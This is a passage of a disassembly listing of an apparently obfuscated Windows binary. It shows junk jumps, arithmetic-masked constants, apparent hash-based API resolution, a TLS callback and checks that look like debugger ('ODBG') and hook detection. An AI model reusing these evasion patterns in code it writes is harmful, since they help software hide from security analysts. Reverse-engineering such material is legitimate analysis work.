loc_424B31: ; CODE XREF: sub_42ADA2:loc_42ADAC�j
cmp dword ptr [ebp-4], 0
jmp loc_42A19F
; END OF FUNCTION CHUNK FOR sub_42ADA2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_424B3A: ; CODE XREF: sub_42C24F+4�j
cmp byte ptr [ebp-5], 0
jnz loc_426C46
jmp loc_426F78
; END OF FUNCTION CHUNK FOR sub_42C24F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42982D
loc_424B49: ; CODE XREF: _94j21ax3:loc_4229F5�j
; sub_42982D:loc_42C2C8�j
jnz loc_421C25
jmp loc_427149
; END OF FUNCTION CHUNK FOR sub_42982D
; =============== S U B R O U T I N E =======================================
sub_424B54 proc near ; DATA XREF: sub_421402:loc_4284D5�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00426DD2 SIZE 0000000A BYTES
call sub_42574E
mov edx, 0CE3062ECh
call sub_4239A5
push 2F648815h
mov [esp+4+var_4], eax
jmp loc_426DD2
sub_424B54 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_55. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_424B71: ; CODE XREF: _94j21ax3:00421EA8�j
jmp loc_427103
; =============== S U B R O U T I N E =======================================
sub_424B76 proc near ; CODE XREF: sub_4259BF:loc_429303�p
; _94j21ax3:0042B0AB�j
xchg edi, [esp+0]
pop edi
mov [ebp-8], edx
mov [ebp-4], eax
loc_424B80: ; CODE XREF: sub_42982D-65E9�j
xor eax, eax
mov [ebp-0Ch], eax
push offset loc_427DF2
jmp nullsub_27
sub_424B76 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424B8F proc near ; CODE XREF: sub_422FC8+A�p
; _94j21ax3:00426FA7�j
; FUNCTION CHUNK AT 004281D4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004299DB SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
mov [ebp-14h], edx
mov eax, [ebp-0Ch]
mov ecx, 3F5h
xor edx, edx
div ecx
mov [ebp-18h], edx
jmp loc_4299DB
sub_424B8F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424BAA proc near ; CODE XREF: _94j21ax3:004292D2�j
; sub_42B1BB+224�p
mov [esp+0], edi
pop edi
push eax
loc_424BAF: ; CODE XREF: sub_424C37:loc_4258E6�j
ror eax, 0Fh
mov ds:dword_42C498, eax
retn
sub_424BAA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_424BB9: ; CODE XREF: sub_421F28+66AB�j
jmp loc_42B6A6
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F9E
loc_424BBE: ; CODE XREF: sub_426F9E-4E14�j
jmp loc_425ADD
; END OF FUNCTION CHUNK FOR sub_426F9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B65
loc_424BC3: ; CODE XREF: sub_426B65+6�j
; sub_42B1BB:loc_42B3CA�j
push offset loc_421E66
jmp loc_42A22E
; END OF FUNCTION CHUNK FOR sub_426B65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_424BCD: ; CODE XREF: sub_42A0CC-501A�j
push 0AE322D75h
pop eax
xor eax, 2914BDCCh
cmp eax, 3C05AE41h
jmp loc_422DD9
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_424BE4: ; CODE XREF: sub_42484C+540F�j
jnz loc_423B52
mov eax, [ebp+8]
mov eax, [eax-8]
or eax, 8
or eax, 10h
mov edx, [ebp+8]
jmp loc_423B4A
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
shl edi, 4
jmp loc_421141
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42131B
loc_424C06: ; CODE XREF: sub_42131B+9E50�j
mov ds:dword_422264, eax
mov eax, [ebp+var_C]
push 8CF367F4h
pop ecx
push offset sub_422FC8
jmp nullsub_186
; END OF FUNCTION CHUNK FOR sub_42131B
; ---------------------------------------------------------------------------
loc_424C1E: ; CODE XREF: _94j21ax3:00429E0E�j
add edx, 0EFB3F806h
mov edx, [edx]
xchg edx, [esp]
push edx
pushf
push 0CB9A243Ch
jmp loc_42B083
; ---------------------------------------------------------------------------
loc_424C35: ; CODE XREF: _94j21ax3:00422992�j
not eax
; =============== S U B R O U T I N E =======================================
sub_424C37 proc near ; CODE XREF: sub_427A68-338E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004217A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004228B4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00422997 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00423166 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00423CDD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004240E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004258DB SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426856 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426CCF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004286D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429B6C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042A1AA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042BE43 SIZE 00000008 BYTES
xchg edx, [esp+8+var_8]
pop edx
test eax, eax
jz loc_4258DB
jmp loc_4286D1
sub_424C37 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_424C48: ; CODE XREF: sub_423324:loc_425861�j
add eax, 5
jmp loc_426C84
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_424C50: ; CODE XREF: sub_423F55:loc_4241E1�j
mov eax, [ebp-4]
call sub_4225B5
test al, al
jnz loc_42C454
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
jnz loc_426C90
jmp loc_42C200
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
loc_424C71: ; DATA XREF: sub_421047+91F8�o
shl eax, 3
add [ebp-8], eax
mov eax, [ebp-8]
shr eax, 0Bh
xor [ebp-8], eax
loc_424C80: ; CODE XREF: _94j21ax3:00426BF2�j
mov eax, [ebp-8]
jmp loc_42AA97
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A092
loc_424C88: ; CODE XREF: sub_42A092+13�j
mov edx, 1F56AC7Bh
call sub_4239A5
retn
; END OF FUNCTION CHUNK FOR sub_42A092
; ---------------------------------------------------------------------------
loc_424C93: ; CODE XREF: _94j21ax3:00427475�j
jmp loc_426D67
; ---------------------------------------------------------------------------
loc_424C98: ; CODE XREF: _94j21ax3:00421283�j
jmp locret_4222D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_424C9D: ; CODE XREF: sub_42169F+6A63�j
call sub_421689
test al, al
jmp loc_423E0F
; END OF FUNCTION CHUNK FOR sub_42169F
; =============== S U B R O U T I N E =======================================
sub_424CA9 proc near ; DATA XREF: sub_42AEB2:loc_42BC46�o
xchg edi, [esp+0]
jmp sub_42574E
sub_424CA9 endp
; ---------------------------------------------------------------------------
loc_424CB1: ; DATA XREF: sub_424AED+3921�o
or eax, eax
jnz loc_428CDA
jmp loc_4264A3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_138. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_424CBF: ; CODE XREF: sub_42284F:loc_421105�j
rol ecx, 1Ch
pop ebx
call sub_42169F
loc_424CC8: ; CODE XREF: sub_42134B+6C6�j
jmp loc_424B1A
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
loc_424CCD: ; CODE XREF: _94j21ax3:0042BBC5�j
rol eax, 15h
push ebx
sbb ebx, 0DDE75E99h
jmp loc_4256FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_424CDC: ; CODE XREF: sub_42284F:loc_426A0E�j
jnz loc_425AD0
jmp loc_42BD2B
; END OF FUNCTION CHUNK FOR sub_42284F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_176. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_424CE8: ; CODE XREF: sub_423324+59FA�j
jmp sub_425A09
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429974
loc_424CED: ; CODE XREF: sub_429974-5CCB�j
jmp sub_42574E
; END OF FUNCTION CHUNK FOR sub_429974
; =============== S U B R O U T I N E =======================================
sub_424CF2 proc near ; CODE XREF: sub_42284F+2EB5�p
; sub_426C7A+57E7�j
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 00422C3E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423047 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004295DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C4AC SIZE 00000005 BYTES
mov [esp-0Ch+arg_8], edx
pop edx
xor [esi], ebx
add [esi], ecx
xor [esi], edx
jmp loc_422C3E
sub_424CF2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_424D01: ; CODE XREF: sub_42C1AE:loc_42AEC8�j
push 9783D73Ch
pop eax
jmp loc_426CD4
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
locret_424D0C: ; CODE XREF: _94j21ax3:loc_427890�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_424D0D: ; CODE XREF: sub_423324+35�j
and edx, 4F0D09E0h
or ebp, 6D11DFAEh
rol eax, 0Fh
shr ebp, 0Fh
mov edx, esi
jmp loc_42318E
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
loc_424D26: ; CODE XREF: _94j21ax3:0042BBE4�j
jz loc_42746C
jmp loc_423A6B
; ---------------------------------------------------------------------------
loc_424D31: ; CODE XREF: _94j21ax3:loc_422BCC�j
; _94j21ax3:loc_42473D�j
call nullsub_11
call sub_424475
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_424D3B: ; CODE XREF: sub_428BBD-55B8�j
jmp sub_42574E
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422048
loc_424D40: ; CODE XREF: sub_422048+2F3�j
jmp loc_429ED1
; END OF FUNCTION CHUNK FOR sub_422048
; ---------------------------------------------------------------------------
rol ecx, 5
jmp sub_4241D8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_134. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249A9
loc_424D4E: ; CODE XREF: sub_4249A9+4E20�j
jmp loc_42A1F5
; END OF FUNCTION CHUNK FOR sub_4249A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B03C
loc_424D53: ; CODE XREF: sub_42B03C-7484�j
jmp loc_427F9A
; END OF FUNCTION CHUNK FOR sub_42B03C
; =============== S U B R O U T I N E =======================================
sub_424D58 proc near ; CODE XREF: sub_428BBD:loc_429C69�p
; sub_42484C+7157�j
var_C = dword ptr -0Ch
; FUNCTION CHUNK AT 00426864 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428C31 SIZE 00000005 BYTES
push large dword ptr fs:0
mov large fs:0, esp
push dword ptr [ebp-4]
push esi
push 40DCB3ACh
loc_424D6F: ; CODE XREF: sub_423A56:loc_4263E6�j
pop esi
jmp loc_426864
sub_424D58 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB30
loc_424D75: ; CODE XREF: sub_42AB30+F�j
or eax, eax
jnz loc_424768
call sub_42574E
push offset loc_428029
jmp loc_423993
; END OF FUNCTION CHUNK FOR sub_42AB30
; =============== S U B R O U T I N E =======================================
sub_424D8C proc near ; DATA XREF: _94j21ax3:0042577A�o
var_18 = dword ptr -18h
; FUNCTION CHUNK AT 004219CE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00423189 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B630 SIZE 00000012 BYTES
lea eax, [ebp-80Ch]
push eax
push 0
push 0
push 0
push 0
jmp loc_4219CE
sub_424D8C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test ebp, 29126518h
jmp loc_42A03E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_424DAB: ; CODE XREF: sub_421D33:loc_42B813�j
pop ecx
mov [ebp-20h], eax
jmp loc_428FC8
; END OF FUNCTION CHUNK FOR sub_421D33
; =============== S U B R O U T I N E =======================================
sub_424DB4 proc near ; CODE XREF: sub_421D33+9BCD�p
; FUNCTION CHUNK AT 00426FDC SIZE 00000005 BYTES
push ebp
push offset sub_425330
jmp loc_426FDC
sub_424DB4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421246
loc_424DBF: ; CODE XREF: sub_421246:loc_42BF0A�j
pushf
call sub_422FBC
or edx, 5A0F8D15h
jmp loc_423D1F
; END OF FUNCTION CHUNK FOR sub_421246
; ---------------------------------------------------------------------------
locret_424DD0: ; CODE XREF: _94j21ax3:loc_4256E5�j
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_41. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_424DD2: ; CODE XREF: _94j21ax3:0042451E�j
jmp loc_427ED6
; ---------------------------------------------------------------------------
loc_424DD7: ; CODE XREF: _94j21ax3:00422D60�j
jmp loc_42A7EB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B78
loc_424DDC: ; CODE XREF: sub_423B78:loc_421794�j
mov eax, [ebx]
push offset loc_426E4A
jmp loc_424870
; END OF FUNCTION CHUNK FOR sub_423B78
; =============== S U B R O U T I N E =======================================
sub_424DE8 proc near ; CODE XREF: _94j21ax3:004294D4�j
; sub_42C3BD+4�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00422053 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424649 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004275A4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004295B0 SIZE 0000000A BYTES
mov [esp+0], edx
pop edx
mov esp, ebp
xchg ebx, [esp-4+arg_0]
mov ebp, ebx
jmp loc_4275A4
sub_424DE8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push 416E47FEh
pop eax
sub eax, 9F7003FDh
and eax, 4D98D442h
xor eax, 0A899765Dh
add eax, ebp
jmp loc_426B1F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_424E17: ; CODE XREF: sub_422EB0:loc_42AA21�j
jz loc_421E7B
jmp loc_429312
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4258EB
loc_424E22: ; CODE XREF: sub_4258EB-2BAB�j
cmp al, 0A4h
jnz loc_4299D4
jmp loc_42B264
; END OF FUNCTION CHUNK FOR sub_4258EB
; ---------------------------------------------------------------------------
jmp loc_42A33C
; =============== S U B R O U T I N E =======================================
sub_424E34 proc near ; CODE XREF: sub_423BF8:loc_425B72�j
; sub_427D15+8�p ...
; FUNCTION CHUNK AT 0042B8D1 SIZE 00000005 BYTES
mov edx, 1
lock xchg edx, [eax]
or edx, edx
jz nullsub_29
jmp loc_42B8D1
sub_424E34 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425868
loc_424E49: ; CODE XREF: sub_425868:loc_42345F�j
jz loc_4241CA
shl ebx, 1Dh
add ebx, edi
jmp loc_4241CA
; END OF FUNCTION CHUNK FOR sub_425868
; ---------------------------------------------------------------------------
loc_424E59: ; CODE XREF: _94j21ax3:0042C502�j
jnz loc_4285DC
; START OF FUNCTION CHUNK FOR sub_42270C
loc_424E5F: ; CODE XREF: sub_42270C+815E�j
jmp loc_4227E7
; END OF FUNCTION CHUNK FOR sub_42270C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_424E64: ; CODE XREF: sub_428BBD+10BF�j
jmp loc_42AD7B
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_424E69: ; CODE XREF: sub_4294B3-6F96�j
jmp loc_423B2B
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
jns loc_424F79
sub esi, ebx
jmp loc_4285D8
; ---------------------------------------------------------------------------
loc_424E7B: ; DATA XREF: _94j21ax3:0042321D�o
add edi, 0E6CA0E52h
add edi, ebp
call sub_422DF2
; START OF FUNCTION CHUNK FOR sub_42B358
loc_424E88: ; CODE XREF: sub_42B358+13�j
jmp loc_42AD61
; END OF FUNCTION CHUNK FOR sub_42B358
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_85. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422538
loc_424E8E: ; CODE XREF: sub_422538+6B2C�j
jmp loc_42722A
; END OF FUNCTION CHUNK FOR sub_422538
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_172. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422A67
loc_424E94: ; CODE XREF: sub_422A67+F�j
jmp nullsub_209
; END OF FUNCTION CHUNK FOR sub_422A67
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_424E99: ; CODE XREF: sub_42C1AE:loc_427EE0�j
jnz loc_42C424
jmp loc_42BD50
; END OF FUNCTION CHUNK FOR sub_42C1AE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_140. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C35
loc_424EA5: ; CODE XREF: sub_427C35:loc_42362D�j
add eax, 4
loc_424EA8: ; CODE XREF: sub_42B314:loc_429750�j
mov ebx, [eax]
add eax, 4
mov edi, [eax]
jmp loc_429205
; END OF FUNCTION CHUNK FOR sub_427C35
; =============== S U B R O U T I N E =======================================
sub_424EB4 proc near ; CODE XREF: _94j21ax3:0042518A�j
; sub_42B079�p
; FUNCTION CHUNK AT 00425119 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042A0AA SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042B88C SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042C31A SIZE 0000000A BYTES
mov [esp+0], esi
pop esi
jz loc_42C31A
call sub_42A254
loc_424EC3: ; CODE XREF: sub_427D15-638�j
jmp loc_42A0AA
sub_424EB4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_424EC8: ; CODE XREF: sub_422866-966�j
jmp loc_4251B8
; END OF FUNCTION CHUNK FOR sub_422866
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_424ECD: ; CODE XREF: sub_42C1AE-9DF0�j
adc esi, 0F783067Ch
loc_424ED3: ; CODE XREF: sub_42C1AE:loc_4210EF�j
cmp ebx, 68747541h
jz loc_42877C
jmp loc_427EE0
; END OF FUNCTION CHUNK FOR sub_42C1AE
; =============== S U B R O U T I N E =======================================
sub_424EE4 proc near ; DATA XREF: sub_42266A+55DD�o
; FUNCTION CHUNK AT 00422E99 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004253A1 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004287A5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429CDC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A69B SIZE 0000000D BYTES
push 0
call sub_42651A
pop eax
cmp dword ptr [eax], 0
jmp loc_429CDC
sub_424EE4 endp
; ---------------------------------------------------------------------------
loc_424EF4: ; CODE XREF: _94j21ax3:0042B120�j
js loc_42325F
; =============== S U B R O U T I N E =======================================
sub_424EFA proc near ; CODE XREF: sub_42651A+3192�p
; FUNCTION CHUNK AT 00424748 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004263E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426EA4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00429E4B SIZE 0000001E BYTES
xchg ecx, [esp+0]
pop ecx
push ebp
xchg ebx, ebp
pushf
jmp loc_4263E1
sub_424EFA endp
; =============== S U B R O U T I N E =======================================
sub_424F07 proc near ; DATA XREF: _94j21ax3:00422C2D�o
; FUNCTION CHUNK AT 00429C81 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042B4C7 SIZE 00000005 BYTES
mov byte ptr [eax], 64h
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
jmp loc_42B4C7
sub_424F07 endp
; ---------------------------------------------------------------------------
cdq
not ecx
jmp sub_42B405
; ---------------------------------------------------------------------------
mov eax, [ebp-4]
and dword ptr [eax+24h], 7FFFFFFFh
lea eax, [ebp-14h]
push eax
push 0CDCD7534h
jmp loc_426CCA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C149
loc_424F44: ; CODE XREF: sub_42C149+15�j
add ecx, 0F5DE0796h
xchg ecx, [esp+0]
jmp loc_429F90
; END OF FUNCTION CHUNK FOR sub_42C149
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4251A2
loc_424F52: ; CODE XREF: sub_4251A2+11�j
push edi
push 9C6F7D34h
xchg ebx, [esp+8+var_8]
mov edi, ebx
loc_424F5D: ; CODE XREF: _94j21ax3:loc_42861A�j
pop ebx
jmp loc_42BA0A
; END OF FUNCTION CHUNK FOR sub_4251A2
; ---------------------------------------------------------------------------
push 431EA84Eh
jmp loc_42B036
; ---------------------------------------------------------------------------
add esi, ebx
jmp loc_4214E0
; ---------------------------------------------------------------------------
loc_424F74: ; DATA XREF: sub_42B487-86D0�o
push 68B1120Eh
loc_424F79: ; CODE XREF: _94j21ax3:00424E6E�j
mov eax, offset sub_42997D
xchg eax, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BDF4
loc_424F82: ; CODE XREF: sub_42BDF4-668D�j
jmp nullsub_139
; END OF FUNCTION CHUNK FOR sub_42BDF4
; ---------------------------------------------------------------------------
locret_424F87: ; CODE XREF: _94j21ax3:00427802�j
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_152. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_424F89: ; CODE XREF: _94j21ax3:00423697�j
jmp loc_421901
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_424F8E: ; CODE XREF: sub_4294B3-4A8E�j
jns loc_429B29
loc_424F94: ; CODE XREF: sub_4294B3:loc_42583C�j
lea eax, [ebp-2AAh]
cmp dword ptr [eax], 4742444Fh
jz loc_42A566
jmp loc_422823
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424320
loc_424FAB: ; CODE XREF: sub_424320+2E7B�j
mov [edx], esi
mov eax, 8D356F30h
sbb eax, 17B80147h
jmp loc_423DC7
; END OF FUNCTION CHUNK FOR sub_424320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421393
loc_424FBD: ; CODE XREF: sub_421393:loc_42BA85�j
add edx, 1A6CF1h
popf
xchg edx, [esp+0]
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_421393
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR TlsCallback_0
loc_424FCC: ; CODE XREF: TlsCallback_0-2D8A�j
jz loc_423F9E
jmp loc_426F3C
; END OF FUNCTION CHUNK FOR TlsCallback_0
; ---------------------------------------------------------------------------
loc_424FD7: ; CODE XREF: _94j21ax3:00429012�j
jb loc_421276
shr edi, 1Fh
; =============== S U B R O U T I N E =======================================
sub_424FE0 proc near ; CODE XREF: _94j21ax3:004253D2�p
mov [esp+0], edi
pop edi
sbb eax, eax
neg eax
push edx
push 0A7C649A7h
jmp loc_428650
sub_424FE0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429DCC
loc_424FF3: ; CODE XREF: sub_429DCC-F66�j
mov ebp, eax
loc_424FF5: ; CODE XREF: sub_429DCC:loc_428E5E�j
or eax, 92ECAFFEh
add eax, 4555844Ah
call sub_428F65
test al, al
jz nullsub_86
jmp loc_423421
; END OF FUNCTION CHUNK FOR sub_429DCC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_425013: ; CODE XREF: sub_42484C:loc_423679�j
ror edx, 18h
cdq
add edx, edi
loc_425019: ; CODE XREF: _94j21ax3:loc_42C1CA�j
jmp loc_4249B4
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_42501E: ; CODE XREF: sub_421402+15�j
xchg edi, [esp+0]
lea eax, [ebp-806h]
push eax
push ebx
jmp loc_4226D5
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
mov [ebx], edi
jmp sub_429964
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249A9
loc_425035: ; CODE XREF: sub_4249A9:loc_4245D0�j
mov edi, ebx
jmp loc_421BB5
; END OF FUNCTION CHUNK FOR sub_4249A9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_154. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42426B
loc_42503D: ; CODE XREF: sub_42426B:loc_42A553�j
jl loc_428C90
jmp loc_4230A4
; END OF FUNCTION CHUNK FOR sub_42426B
; ---------------------------------------------------------------------------
push eax
ror eax, 4
mov ds:dword_424078, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425819
loc_425053: ; CODE XREF: sub_425819-3506�j
jmp loc_4267E9
; END OF FUNCTION CHUNK FOR sub_425819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_425058: ; CODE XREF: sub_429862:loc_421D1B�j
jz loc_42506D
inc [ebp+var_8]
loc_425061: ; CODE XREF: _94j21ax3:00422782�j
; sub_429862-70D7�j
mov eax, [ebp+var_8]
pop ecx
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_429862
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A254
loc_425068: ; CODE XREF: sub_42A254-8301�j
jmp loc_424543
; END OF FUNCTION CHUNK FOR sub_42A254
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_42506D: ; CODE XREF: sub_429862:loc_425058�j
mov eax, [ebp+arg_0]
jmp loc_4245C6
; END OF FUNCTION CHUNK FOR sub_429862
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAC2
loc_425075: ; CODE XREF: sub_42BAC2+D�j
adc edx, ebx
; END OF FUNCTION CHUNK FOR sub_42BAC2
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_425077: ; CODE XREF: sub_4294B3:loc_4218DE�j
; sub_42A268+4�j ...
jnb loc_4218BE
cmp dword ptr [ebp-4], 2
jnz loc_4299AB
jmp loc_422BB4
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42508C: ; CODE XREF: sub_428BBD:loc_428BD4�j
add esi, 1FFF2717h
test eax, edi
jmp loc_42168F
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_425099: ; CODE XREF: sub_423324:loc_42C20C�j
pushf
push 2170A96Bh
pop edx
sub edx, 8ED2E792h
add edx, 6D623E27h
; END OF FUNCTION CHUNK FOR sub_423324
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_4250AC: ; CODE XREF: sub_42A0CC-6C02�j
popf
xchg edx, [esp+0]
push 10h
jmp loc_424BCD
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
loc_4250B7: ; DATA XREF: sub_426C7A+273�o
cmp dword ptr [ebp-8], 0
jle loc_42C454
mov eax, [ebp-4]
xor edx, edx
push edx
push eax
mov eax, [ebp-8]
jmp loc_422810
; =============== S U B R O U T I N E =======================================
sub_4250D0 proc near ; CODE XREF: sub_423081:loc_422DD4�p
; _94j21ax3:004279D2�j
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
add eax, 41C4D223h
xchg eax, [esp-4+arg_0]
jmp sub_4210AA
sub_4250D0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov edx, 1AE260E8h
jmp loc_423184
; ---------------------------------------------------------------------------
